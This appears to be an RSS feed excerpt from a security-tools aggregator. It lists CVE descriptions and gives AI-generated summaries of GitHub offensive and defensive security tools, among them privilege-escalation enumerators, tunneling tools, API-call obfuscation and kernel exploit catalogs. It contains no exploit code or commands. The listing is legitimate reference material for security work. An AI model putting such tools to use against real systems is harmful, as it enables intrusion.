 &lt;td style="text-align: left"&gt;An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-7494&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-8464&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka &amp;ldquo;LNK Remote Code Execution Vulnerability.&amp;rdquo;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-9791&lt;/td&gt;
 &lt;td style="text-align: left"&gt;The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2018-4407&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Apple iOS 11 and earlier, Apple macOS High Sierra, up to and including 10.13.6, Apple macOS Sierra, up to and including 10.12.6, Apple OS X El Capitan and earlier. A heap buffer overflow is allowed in Apple&amp;rsquo;s XNU operating system kernel.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2018-7600&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2018-10562&lt;/td&gt;
 &lt;td style="text-align: left"&gt;An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it&amp;rsquo;s quite simple to execute commands and retrieve their output.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;MS17_010&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010"&gt;https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;NETCORE_NETDIS_UDP-53413-BACKDOOR&lt;/td&gt;
 &lt;td style="text-align: left"&gt;&lt;a href="http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/"&gt;http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;</description></item><item><title>LADX-Disassembly</title><link>https://rainmana.github.io/hackyfeed/tools/zladx-ladx-disassembly/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zladx-ladx-disassembly/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; LADX-Disassembly is a comprehensive disassembly project for the Game Boy Color game &amp;ldquo;The Legend of Zelda: Link&amp;rsquo;s Awakening DX,&amp;rdquo; enabling developers to build multiple ROM versions in various languages (Japanese, English, German, French) along with their debug symbols. It features tools and documentation for reverse engineering the game engine and understanding data formats, providing a wiki for navigation and contributions. The project also invites community participation to improve its code and documentation.&lt;/p&gt;</description></item><item><title>lamda</title><link>https://rainmana.github.io/hackyfeed/tools/firerpa-lamda/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/firerpa-lamda/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FIRERPA is an advanced Android automation framework designed for on-device operations, providing a comprehensive suite of over 160 APIs for device management, UI automation, and diagnostics. Its primary use case is to enable lightweight, efficient automation for both physical and virtual Android devices, integrating AI-driven capabilities with robust remote desktop services. Notable features include built-in ADB/SSH/SCP support, extensive logging, encrypted scripting, and seamless deployment across a range of Android versions without complex configuration requirements.&lt;/p&gt;</description></item><item><title>landrun</title><link>https://rainmana.github.io/hackyfeed/tools/zouuup-landrun/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zouuup-landrun/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Landrun is a lightweight sandboxing tool for Linux designed to run processes securely using the Landlock kernel security module, enabling fine-grained control over filesystem and network access without the need for root privileges or containerization. Notable features include kernel-level security, customizable read, write, and execution permissions for files and directories, and TCP access control, making it suitable for securely executing commands in an isolated environment. With a minimal overhead architecture, it offers a practical solution for developers needing enhanced process security.&lt;/p&gt;</description></item><item><title>lazy_importer</title><link>https://rainmana.github.io/hackyfeed/tools/justasmasiulis-lazy_importer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/justasmasiulis-lazy_importer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; lazy_importer is a C++ library designed to obfuscate API calls, enhancing the difficulty of reverse engineering software by ensuring that no identifiable strings or import declarations remain in memory or the executable. Key features include inlining capabilities, zero memory allocation, randomized function hashes for each compilation, and the ability to call functions without leaving a trace in data sections. This tool is particularly valuable for developers aiming to protect their software from static analysis and reverse engineering techniques.&lt;/p&gt;</description></item><item><title>leaky-paths</title><link>https://rainmana.github.io/hackyfeed/tools/ayoubfathi-leaky-paths/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ayoubfathi-leaky-paths/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Leaky Paths is a curated repository of high-quality wordlists designed for web content discovery, targeting misconfigurations and sensitive API endpoints in major web frameworks and infrastructure projects. It serves as a rapid assessment tool for pentesters, security engineers, and bug bounty hunters, emphasizing modern tech stack paths that yield valuable insights while intentionally maintaining a concise list for optimal efficiency. Notable features include paths associated with known vulnerabilities and endpoints that typically expose sensitive data, facilitating quick identification of potential security issues.&lt;/p&gt;</description></item><item><title>Learn-Web-Hacking</title><link>https://rainmana.github.io/hackyfeed/tools/lylemi-learn-web-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lylemi-learn-web-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Learn-Web-Hacking is a comprehensive guide designed for individuals interested in web security, systematically organizing essential concepts and knowledge related to web application vulnerabilities, network protocols, and penetration testing. It provides a historical perspective on the evolution of web security, foundational networking concepts, and a detailed exploration of common web vulnerabilities and defensive strategies. Additionally, it includes tool recommendations and resources, making it a valuable resource for both beginners and practitioners in the cybersecurity field.&lt;/p&gt;</description></item><item><title>learn365</title><link>https://rainmana.github.io/hackyfeed/tools/harsh-bothra-learn365/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/harsh-bothra-learn365/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Learn365 is a personal initiative designed to promote continuous learning, focusing on various cybersecurity topics and methodologies over a year-long challenge. The repository includes extensive documentation covering diverse subjects such as vulnerability exploitation, secure coding practices, and penetration testing checklists. Notable features include daily learning topics with associated resources and mind maps, making it a comprehensive tool for knowledge enhancement in the infosec domain.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="learn365"&gt;Learn365&lt;/h1&gt;
&lt;p&gt;This repository contains all the information shared during my Learn 365 Challenge. Learn 365 is a challenge to keep the learning spirit going on and challenge myself to learn something daily for the whole year, it can be anything from infosec to general life. Follow me on Twitter for Regular Updates: &lt;a href="https://twitter.com/harshbothra_"&gt;Harsh Bothra&lt;/a&gt;. Huge thanks to &lt;a href="https://twitter.com/remonsec"&gt;Mehedi Hasan Remon&lt;/a&gt;, who originally created and maintained this repository.&lt;/p&gt;</description></item><item><title>learning-reverse-engineering</title><link>https://rainmana.github.io/hackyfeed/tools/jstrosch-learning-reverse-engineering/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jstrosch-learning-reverse-engineering/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Learning Reverse Engineering repository provides a collection of programs aimed at enhancing skills in reverse engineering and malware analysis. It organizes content by specific concepts related to reverse engineering, delivers both source code and compiled binaries, and includes links to supplementary online courses and video playlists. Notable features include guidance on using various tools like Ghidra and IDA Pro, as well as instructions for compiling the source code with Microsoft’s C/C++ compiler.&lt;/p&gt;</description></item><item><title>Legendary_OSINT</title><link>https://rainmana.github.io/hackyfeed/tools/k2sosint-legendary_osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/k2sosint-legendary_osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Legendary OSINT is a comprehensive curated repository of open-source intelligence (OSINT) tools and resources designed to aid users in various investigative scenarios. It encompasses a diverse range of categories, including social media searches, geospatial analysis, malware investigation, and dark web monitoring, facilitating enhanced data collection and analysis for cybersecurity professionals and researchers. Notable features include categorized documentation, contributions from multiple sources, and a focus on responsible usage of third-party tools.&lt;/p&gt;</description></item><item><title>libc-database</title><link>https://rainmana.github.io/hackyfeed/tools/niklasb-libc-database/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/niklasb-libc-database/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; libc-database is a tool for building and querying a database of libc offsets, primarily used for security research and exploitation analysis. It offers features such as identifying libraries via hashes, downloading and extracting libc libraries, and a web interface for user interaction. Users can also add custom libc versions and retrieve relevant offsets for specific symbols, enhancing their ability to work with different environments in cybersecurity applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="web-interface"&gt;Web interface&lt;/h2&gt;
&lt;p&gt;libc-database now has a web service and frontend. Visit &lt;a href="https://libc.rip/"&gt;https://libc.rip/&lt;/a&gt; to
try it out! Read &lt;a href="https://github.com/niklasb/libc-database/tree/master/searchengine"&gt;https://github.com/niklasb/libc-database/tree/master/searchengine&lt;/a&gt;
if you are interested in the API.&lt;/p&gt;</description></item><item><title>librw</title><link>https://rainmana.github.io/hackyfeed/tools/aap-librw/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aap-librw/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; librw is a cross-platform library designed to re-implement parts of RenderWare graphics, facilitating rendering and file format conversion across various platforms. It supports DFF and TXD file formats for PS2, D3D8, D3D9, and Xbox, with rendering capabilities via D3D9 and OpenGL backends, while being particularly useful for rendering within projects like GTA. Notable features include adaptable file format support, backend rendering versatility, and ongoing compatibility for multiple platforms.&lt;/p&gt;</description></item><item><title>lighthouse</title><link>https://rainmana.github.io/hackyfeed/tools/gaasedelen-lighthouse/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gaasedelen-lighthouse/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Lighthouse is an advanced code coverage explorer plugin designed for IDA Pro and Binary Ninja, aimed at software researchers examining execution maps of native applications without the need for symbols or source code. It features interactive controls for coverage painting across multiple views, customizable coverage formats, and a comprehensive overview widget that enhances analysis capabilities. The tool has garnered recognition within the security research community, placing in IDA&amp;rsquo;s 2017 Plug-In Contest and receiving a nomination for the 2021 Pwnie Awards.&lt;/p&gt;</description></item><item><title>ligolo-ng</title><link>https://rainmana.github.io/hackyfeed/tools/nicocha30-ligolo-ng/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nicocha30-ligolo-ng/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ligolo-ng is an advanced tunneling tool that establishes connections through a TUN interface, enabling penetration testers to create reverse TCP/TLS tunnels without the need for SOCKS proxies. Notable features include a user-friendly web interface, automatic configuration for certificates, support for multiple platforms, and resilience to network issues with automatic tunnel recovery. Its design facilitates streamlined network management and the ability to run tools directly over these tunnels.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ligolo-ng--tunneling-like-a-vpn"&gt;Ligolo-ng : Tunneling like a VPN&lt;/h1&gt;
&lt;p&gt;&lt;img src="doc/logo.png" alt="Ligolo Logo"&gt;&lt;/p&gt;</description></item><item><title>like-dbg</title><link>https://rainmana.github.io/hackyfeed/tools/0xricksanchez-like-dbg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xricksanchez-like-dbg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; LIKE-DBG is a tool designed to simplify the setup of a Linux kernel debugging environment by automating essential steps such as kernel building, root file system creation, and kernel launching within Docker containers. It offers a highly customizable configuration approach and supports multiple architectures, enabling researchers in kernel exploitation to focus on their work rather than the complexities of environment setup. Notable features include a dedicated Docker setup for each phase, support for various compilation methods, and integrated code quality measures.&lt;/p&gt;</description></item><item><title>linkedin2username</title><link>https://rainmana.github.io/hackyfeed/tools/initstring-linkedin2username/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/initstring-linkedin2username/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; linkedin2username is an OSINT tool designed to generate potential username formats for employees of a specified company using LinkedIn&amp;rsquo;s web interface, requiring user authentication without an API key. Key features include customizable output formats for usernames, the ability to append domain names, and options for depth of search and filtering by keywords. The tool leverages web scraping techniques and is sensitive to LinkedIn&amp;rsquo;s rate limits, making it suitable for security research purposes.&lt;/p&gt;</description></item><item><title>linkook</title><link>https://rainmana.github.io/hackyfeed/tools/jackjuly-linkook/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jackjuly-linkook/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Linkook is an OSINT tool designed for discovering linked social media accounts and associated emails based on a single username across multiple platforms. Its notable features include the ability to check for email breaches using HudsonRock&amp;rsquo;s Cybercrime Intelligence Database, and exporting scan results in a Neo4j-compatible format for visual analysis. The tool supports various command-line options for summarizing output, detailed scans, and configuring data handling.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="linkook"&gt;Linkook&lt;/h1&gt;
&lt;p&gt;English | &lt;a href="README_zh.md"&gt;中文&lt;/a&gt;&lt;/p&gt;</description></item><item><title>linux-exploit-suggester</title><link>https://rainmana.github.io/hackyfeed/tools/the-z-labs-linux-exploit-suggester/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/the-z-labs-linux-exploit-suggester/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Linux Exploit Suggester (LES) is a tool for auditing Linux systems to identify potential privilege escalation vulnerabilities, assessing the system&amp;rsquo;s exposure to known exploits by utilizing heuristic methods. It calculates the likelihood of exploitation for each vulnerability and verifies kernel hardening configurations, offering a comprehensive analysis of both compile-time and run-time security settings. Notable features include detailed exploit documentation, exposure assessment ratings, and integration with kernel hardening verification, making it a valuable resource for security assessments on Linux-based environments.&lt;/p&gt;</description></item><item><title>linux-kernel-exploitation</title><link>https://rainmana.github.io/hackyfeed/tools/xairy-linux-kernel-exploitation/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xairy-linux-kernel-exploitation/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Linux Kernel Exploitation repository serves as a curated collection of resources pertaining to Linux kernel security and exploitation techniques. It provides extensive links to books, methodologies, tools for fuzzing, and training exercises, making it a comprehensive reference for security researchers and practitioners interested in kernel vulnerabilities and exploitation strategies. Notable features include regular updates, categorized content on various exploitation techniques, and a community-driven approach encouraging contributions via pull requests.&lt;/p&gt;</description></item><item><title>linux-kernel-exploits</title><link>https://rainmana.github.io/hackyfeed/tools/secwiki-linux-kernel-exploits/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/secwiki-linux-kernel-exploits/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The linux-kernel-exploits repository provides a catalog of various known vulnerabilities within the Linux kernel, detailing specific CVEs along with their descriptions and affected kernel versions. Its primary use case is to aid security researchers and penetration testers in identifying and exploiting kernel vulnerabilities for testing and mitigation purposes. Notable features include a comprehensive list of CVEs organized by year, along with linked folders containing additional exploit details.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="linux-kernel-exploits"&gt;linux-kernel-exploits&lt;/h1&gt;
&lt;h3 id="简介"&gt;简介&lt;/h3&gt;
&lt;p&gt;linux-kernel-exploits&lt;/p&gt;</description></item><item><title>linux-smart-enumeration</title><link>https://rainmana.github.io/hackyfeed/tools/diego-treitos-linux-smart-enumeration/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/diego-treitos-linux-smart-enumeration/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Linux Smart Enumeration (LSE) is a shell script designed for penetration testing and Capture The Flag (CTF) challenges, aimed at gathering security-relevant information to assist in privilege escalation on Linux systems. Notable features include customizable verbosity levels, targeted section execution, process monitoring, and the ability to serve the script over the network for remote retrieval. The tool is intended to expose vulnerabilities gradually, prioritizing information based on its significance for privilege escalation.&lt;/p&gt;</description></item><item><title>linuxprivchecker</title><link>https://rainmana.github.io/hackyfeed/tools/sleventyeleven-linuxprivchecker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sleventyeleven-linuxprivchecker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Linuxprivchecker is a Python script designed for local execution on Linux systems, aimed at enumerating system information and identifying common privilege escalation vectors, such as world writable files and misconfigurations. Its primary use case is to assist users in learning about potential privilege escalation opportunities within Linux environments without performing direct exploits. Noteworthy features include support for both Python 2 and 3, command options for customizing searches and log outputs, and an emphasis on educational utility for those preparing for penetration testing certifications like OSCP and HTB.&lt;/p&gt;</description></item><item><title>linWinPwn</title><link>https://rainmana.github.io/hackyfeed/tools/lefayjey-linwinpwn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lefayjey-linwinpwn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; linWinPwn is a comprehensive bash script designed for Active Directory penetration testing on Linux, integrating various tools for enumeration, vulnerability checks, modifications, and password dumping. It features both an interactive mode for manual checks and an automated mode for streamlined enumeration, allowing users to perform a wide array of security assessments including LDAP, Kerberos, and MSSQL interactions. Notably, it supports a range of authentication methods and can execute critical checks for known vulnerabilities such as NoPac and ZeroLogon, making it an essential tool for security professionals.&lt;/p&gt;</description></item><item><title>lisa.py</title><link>https://rainmana.github.io/hackyfeed/tools/ant4g0nist-lisa.py/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ant4g0nist-lisa.py/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; lisa.py is a Model-Context Protocol (MCP) integration for LLDB, enabling AI assistants like Claude to interact with debugging sessions through a structured interface. It consists of a server component to handle communication and a plugin for LLDB that exposes debugging functionalities via JSON-RPC, allowing users to execute commands verbally and enhance the debugging experience with natural language processing. Notable features include the capability to create targets, manage breakpoints, control process execution, and evaluate expressions directly from the AI assistant.&lt;/p&gt;</description></item><item><title>LitterBox</title><link>https://rainmana.github.io/hackyfeed/tools/blacksnufkin-litterbox/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blacksnufkin-litterbox/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; LitterBox is a security analysis tool that provides a controlled sandbox environment for red teams to develop, test, and validate exploitation payloads and evasion techniques against modern detection systems. It features advanced analysis capabilities, including file identification, executable and document analysis, and LLM-assisted insights for improved malware behavior examination. Additionally, LitterBox supports various platforms, including Windows and Linux, and integrates easily with Docker, enhancing its usability in diverse security scenarios.&lt;/p&gt;</description></item><item><title>llm-guard</title><link>https://rainmana.github.io/hackyfeed/tools/protectai-llm-guard/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/protectai-llm-guard/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; LLM Guard is a security toolkit designed to enhance the safety of interactions with Large Language Models (LLMs) by providing features such as input sanitization, harmful language detection, data leakage prevention, and protection against prompt injection attacks. It supports easy integration into production environments and offers a variety of prompt and output scanners tailored for specific security concerns. The tool is continuously updated to adapt to emerging threats, ensuring robust security for LLM applications.&lt;/p&gt;</description></item><item><title>LME</title><link>https://rainmana.github.io/hackyfeed/tools/cisagov-lme/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cisagov-lme/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CISA&amp;rsquo;s Logging Made Easy (LME) is an open-source log management platform designed for small to medium-sized organizations to centralize log collection, enhance threat detection, and enable real-time alerting for improved security. Key features include integration with open-source tools for enhanced detection, automated deployment via Ansible scripts, and customizable dashboards with Kibana, making it a scalable solution for securing infrastructure without the need for an existing Security Operations Center (SOC) or extensive resources.&lt;/p&gt;</description></item><item><title>Lockdoor-Framework</title><link>https://rainmana.github.io/hackyfeed/tools/sofianehamlaoui-lockdoor-framework/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sofianehamlaoui-lockdoor-framework/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Lockdoor is a pentesting framework that aggregates a variety of tools for tasks such as information gathering, web hacking, privilege escalation, and reverse engineering. Its notable features include a collection of pre-configured tools categorized by function, support for multiple operating systems, and the ability to generate security assessment reports. However, it is important to note that the project is no longer actively maintained.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://avatars.githubusercontent.com/u/55242164?s=400"&gt;
&lt;/p&gt;
&lt;h2 align="center"&gt; Lockdoor v2.3&lt;br&gt;
⚠️ This project is not maintained anymore. ⚠️
&lt;/h2&gt;
&lt;h1 id="find-more-at-httpsgcokgsttyrjjp"&gt;Find more at &lt;a href="https://g.co/kgs/TtYRJJP"&gt;https://g.co/kgs/TtYRJJP&lt;/a&gt;&lt;/h1&gt;
&lt;h1 id="table-of-contents"&gt;Table of contents&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#table-of-contents"&gt;Table of contents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#changelog---"&gt;Changelog 📌 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#badges--"&gt;Badges 📌 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#support-me--"&gt;Support me 💰 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#contributors--"&gt;Contributors ⭐ :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#versions"&gt;Versions&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#062021--23"&gt;06/2021 : 2.3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#032020--223"&gt;03/2020 : 2.2.3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#blogs--articles--"&gt;Blogs &amp;amp; Articles 📰 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#overview--"&gt;Overview 📙 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#features--"&gt;Features 📙 :&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#pentesting-tools-selection--"&gt;Pentesting Tools Selection 📙 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#resources-and-cheatsheets--"&gt;Resources and cheatsheets 📙 :&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#screenshots--"&gt;Screenshots 💻 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#demos--"&gt;Demos 💻 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#installation-%EF%B8%8F-"&gt;Installation 🛠️ :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lockdoor-tools-contents-%EF%B8%8F-"&gt;Lockdoor Tools contents 🛠️ :&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#information-gathering-mag_right-"&gt;&lt;strong&gt;Information Gathering&lt;/strong&gt; :mag_right: :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#web-hacking--"&gt;&lt;strong&gt;Web Hacking&lt;/strong&gt; 🌐 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#privilege-escalation-%EF%B8%8F-"&gt;&lt;strong&gt;Privilege Escalation&lt;/strong&gt; ⚠️ :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#reverse-engineering-"&gt;&lt;strong&gt;Reverse Engineering&lt;/strong&gt; ⚡:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploitation-"&gt;&lt;strong&gt;Exploitation&lt;/strong&gt; ❗:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#shells-"&gt;&lt;strong&gt;Shells&lt;/strong&gt; 🐚:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#password-attacks-%EF%B8%8F"&gt;&lt;strong&gt;Password Attacks&lt;/strong&gt; ✳️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#encryption---decryption-%EF%B8%8F"&gt;&lt;strong&gt;Encryption - Decryption&lt;/strong&gt; 🛡️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#social-engineering-"&gt;&lt;strong&gt;Social Engineering&lt;/strong&gt; 🎭:&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#lockdoor-resources-contents--"&gt;Lockdoor Resources contents 📚 :&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#information-gathering-mag_right-"&gt;&lt;strong&gt;Information Gathering&lt;/strong&gt; :mag_right: :&lt;/a&gt;&lt;/li&gt;
